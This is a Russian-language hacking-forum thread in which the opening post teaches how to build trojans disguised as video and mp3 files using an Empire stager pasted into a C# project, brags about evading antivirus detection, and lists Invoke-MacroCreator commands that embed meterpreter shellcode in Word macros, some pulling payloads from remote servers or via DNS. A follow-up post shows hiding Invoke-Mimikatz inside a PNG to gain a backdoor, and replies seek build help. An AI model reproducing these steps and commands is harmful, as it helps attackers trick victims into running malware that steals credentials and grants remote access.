![]() |
Всем привет, решил здесь оставить свой след в ветке, касаемо нашей любимой темы, пусть останется в веках!))
Заражать мы будем самые распространенные файлы которыми пользуется каждый, так же решил, я еще и доказать Вам свою проф пригодность) да и думаю не хер в себе все держать! Нужно делится своими находками и наработками! Чего и Вам желаю.. одно подозрительное слово "находками" Да признаюсь сразу эту технику я честно.... спиздил, но при минимальном знании программирования и работай с visual-studio ее можно настроить под себя) Итак начнем, с заражения видео файла. Нам по требуется visual-studio 2017 с языком С#, Empire or Metasploit. Я лично буду юзать империю. Генерим в империи батник, предварительно настроив listener : usestager | windows/launcher_bat убираем лишнее, берем нужное как показано ниже! https://forum.antichat.xyz/attachmen...d4dd4bfed5.png Скачиваем эту сборочку открываем в студии и .. https://forum.antichat.xyz/attachmen...21b2f4f064.png как видите редачим, файл Program.cs и вставляем в 21(очко)) строчку свою строчку сгенеренную в империи) Детект только один из 40 палит только касперыч( все просто до "не могу" И не дай мне Бог увидеть эти методики на каких нить РУ-бордах так как я знаю что в РУ-зоне впервые они описываются!) и как этот видео проект создавался Вы поймете ниже на примере создания mp3-virusЗаражаем mp3 https://forum.antichat.xyz/attachmen...4397e2daaa.png Создаем проект как показано выше. Удаляем стандартное заполнение и вставляем свое: Код: Код:
using System;[обратите внимание на 25 строку в коде] Уже уловили суть? хех.. Самое главное видео показывает и музыка играет, а к Вам прилетает заветная сессия!) переименовываем 5 строчку https://forum.antichat.xyz/attachmen...ebb316dc75.png в свойствах ConsoleApp1 добавляем mp3 ресурс https://forum.antichat.xyz/attachmen...ee2302733d.png назовем его античат .mp3 далее изменяем эти строки: https://forum.antichat.xyz/attachmen...f3b48aed4c.png ну и "грузим" своей нагрузкой в нашу 21 строку coздаем иконку зайдя на этот онлайн ресурс эту .ico грузим к себе в ресурсы нашей злой эмпэтри - прожки )) https://forum.antichat.xyz/attachmen...df795e8716.png и собираем наше творение... с GIF-ками и PDF-ками я думаю справитесь.... теперь макрос-ы "Эх! Говорит и показывает Рассея" Шариков П.П слышали про Invoke лютого криптовщика PowerShell так вот создали продукт на основе его трудов. PowerShellScripts https://forum.antichat.xyz/attachmen...3e3e26aef6.png Свежачок, для красной братвы!) Шеллкод, встроенный в тело документа MS-Word, без обфускации, без уклонения от песочницы: Код: Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d bodyКод: Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -oКод: Код:
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -eКод: Код:
C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3Код: Код:
C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1Код: Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -aКод: Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -oСпасибо за внимание, с вами был на веки Ваш Ondrik8) |
Отличный пример классной статьи! С почином в красной ветке
|
Круто
|
Две новости и все хорошие!)
Новый mimikatz https://forum.antichat.xyz/attachmen...f127446a78.png Бля, понять не могу что у них за логотип?) У этих епнутых англичан... ии.... гвоздь сегодняшнего дня! та-дааам... Заражаем через )) PNG то есть в картинке в пикселях "полезная" нагрузка (PAYLOAD) нам же стоит только закинуть считыватель этого трояна, который в свою очередь считывает код с картинки и откроет нам? правильно,) "задний проход" через который мы с успехом и залезем!) Фу бля( пишу и дурная картинка перед глазами встала... https://forum.antichat.xyz/attachmen...37ed4a0975.png изображение 1920x1200 -Script [путь к файлу ] Путь к скрипту для вставки в изображение.-Image [filepath] Изображение для встраивания скрипта в. -Out [filepath] Файл для сохранения полученного изображения (изображение будет PNG) -Web Выведите команду для чтения изображения из Интернета вместо чтения из файла. Вам нужно будет разместить изображение и вставить URL-адрес в команду. Создаём картинку со "сценарием" «Invoke-Mimikatz.ps1», встроенным в него, и выведите oneliner для выполнения с диска, то есть офлайн или в локалке, методика так себе, не очень.. Код: Код:
PS>Import-Module .\Invoke-PSImage.ps1Код: Код:
PS>Import-Module .\Invoke-PSImage.ps1Удачи! |
Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?
|
Цитата:
Код: Код:
ConsoleApp4.Properties.Resources.codeby |
Цитата:
|
Разобрался))
|
Цитата:
|
Цитата:
|
| Время: 06:24 |